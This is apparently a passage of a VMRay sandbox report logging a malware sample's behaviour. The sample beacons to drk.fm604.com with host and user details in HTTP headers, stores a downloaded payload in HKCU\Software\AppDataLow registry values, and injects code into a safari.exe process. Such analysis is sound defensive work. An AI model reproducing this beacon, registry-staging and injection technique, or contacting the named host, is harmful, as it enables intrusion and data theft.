1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyEnable, data = 0 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0, access_type = INTERNET_OPEN_TYPE_DIRECT |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = drk.fm604.com, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /rbody32, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-File-Name: C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-User-Name: X2VS1CUM\Nd9E1FYi |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyServer |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyOverride |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = AutoConfigURL |
|
1 | |
| System | Get Computer Name | result_out = X2VS1CUM |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-ComputerName: X2VS1CUM |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-OSVersion: 6.2.9200| 0.0|1|0x00000100 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-VendorId: 2816 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\* |
|
1 | |
| Environment | Get Environment String | name = crackmeololo |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-IsTrustedComp: 0 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-HTTP-Agent: WININET |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-Present: FALSE |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-Used: FALSE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = AutoDetect |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-AutoDetect: FALSE |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = drk.fm604.com/rbody32 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 512, size_out = 512 |
|
249 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_0 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_1 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_2 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_3 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_4 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_5 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_6 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_7 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_8 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_9 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_10 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_11 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_12 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_13 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_14 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_15 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_16 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_17 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_18 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_19 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_20 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_21 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_22 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_23 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_24 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_25 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_26 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_27 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_28 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_29 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_30 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_31 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_32 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_33 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_34 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_35 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_36 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_37 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_38 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_39 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_40 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_41 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_42 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_43 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_44 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_45 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_46 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_47 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_48 |
|
1 | |
| Registry | Delete Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_49 |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_0, size = 512000, type = REG_BINARY |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_1, size = 512000, type = REG_BINARY |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_2, size = 512000, type = REG_BINARY |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_3, size = 512000, type = REG_BINARY |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_4, size = 512000, type = REG_BINARY |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_5, size = 512000, type = REG_BINARY |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_6, size = 512000, type = REG_BINARY |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_7, size = 350258, type = REG_BINARY |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlDecompressBuffer, address_out = 0x779d6b80 |
|
1 | |
| Debug | process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, type = DEBUG_STRING, text = WMA 3 |
|
1 |
Process #8: safari.exe
0
0
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\program files (x86)\msecache\safari.exe |
| Command Line | "C:\Program Files (x86)\MSECache\safari.exe" |
| Initial Working Directory | C:\Program Files (x86)\MSECache\ |
| Monitor | Start Time: 00:01:10, Reason: Injection |
| Unmonitor | End Time: 00:02:24, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:14 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc3c |
| Parent PID | 0x84c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | X2VS1CUM\Nd9E1FYi |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
14C
0x
C44
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00044fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000090000 | 0x00090000 | 0x00093fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000a0000 | 0x000a0000 | 0x000a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x000b3fff | Private Memory | rw |
|
|
|
- |
| safari.exe | 0x000c0000 | 0x000d6fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x001dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001e1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x001f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000400000 | 0x00400000 | 0x00403fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000410000 | 0x00410000 | 0x00427fff | Pagefile Backed Memory | rwx |
|
|
|
- |
| private_0x0000000000430000 | 0x00430000 | 0x0043ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00440000 | 0x004fdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000500000 | 0x00500000 | 0x00500fff | Private Memory | rx |
|
|
|
- |
| private_0x0000000000510000 | 0x00510000 | 0x00510fff | Private Memory | rx |
|
|
|
- |
| pagefile_0x0000000000520000 | 0x00520000 | 0x00537fff | Pagefile Backed Memory | rwx |
|
|
|
- |
| pagefile_0x0000000000540000 | 0x00540000 | 0x005fbfff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x006fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000700000 | 0x00700000 | 0x00700fff | Private Memory | rx |
|
|
|
- |
| private_0x0000000000710000 | 0x00710000 | 0x00710fff | Private Memory | rx |
|
|
|
- |
| pagefile_0x0000000000800000 | 0x00800000 | 0x00987fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000990000 | 0x00990000 | 0x00b10fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000b20000 | 0x00b20000 | 0x01f1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001f20000 | 0x01f20000 | 0x01f5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002030000 | 0x02030000 | 0x0203ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002040000 | 0x02040000 | 0x0213ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002180000 | 0x02180000 | 0x0218ffff | Private Memory | rw |
|
|
|
- |
| wow64win.dll | 0x55c00000 | 0x55c79fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x55c80000 | 0x55c87fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x55c90000 | 0x55cdffff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x70020000 | 0x7003cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x70b10000 | 0x70b84fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x745e0000 | 0x74671fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74680000 | 0x74689fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74690000 | 0x746adfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x74720000 | 0x74763fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x747c0000 | 0x7487dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74880000 | 0x74a3cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x75070000 | 0x7511cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x765a0000 | 0x7667ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76f00000 | 0x7704efff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x772e0000 | 0x7730afff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x773a0000 | 0x773f7fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x774c0000 | 0x7763dfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x77640000 | 0x7775efff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77810000 | 0x77956fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77960000 | 0x77adafff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ed10000 | 0x7ed10000 | 0x7ee0ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ee10000 | 0x7ee10000 | 0x7ee32fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc1562ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc15630000 | 0x7ffc157f0fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc157f1000 | 0x7ffc157f1000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x410000, size = 98304 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x510000, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x510001, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x510002, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x510003, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x510004, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500000, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500001, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500002, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500003, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500004, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500005, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500006, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500007, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500008, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500009, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50000a, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50000b, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50000c, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50000d, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50000e, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50000f, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500010, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500011, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500012, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500013, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500014, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500015, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500016, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500017, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500018, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500019, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50001a, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50001b, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50001c, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50001d, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50001e, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50001f, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500020, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500021, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500022, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500023, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500024, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500025, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500026, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500027, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500028, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500029, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50002a, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50002b, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50002c, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50002d, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50002e, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50002f, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500030, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500031, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500032, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500033, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500034, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500035, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500036, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500037, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500038, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x500039, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50003a, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50003b, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x50003c, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x7782d9b0, size = 1 |
|
2 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x7782d9b1, size = 1 |
|
2 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x7782d9b2, size = 1 |
|
2 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x7782d9b3, size = 1 |
|
2 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x7782d9b4, size = 1 |
|
2 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x520000, size = 98304 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x710000, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x710001, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x710002, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x710003, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x710004, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700000, size = 1 |
|
1 | |
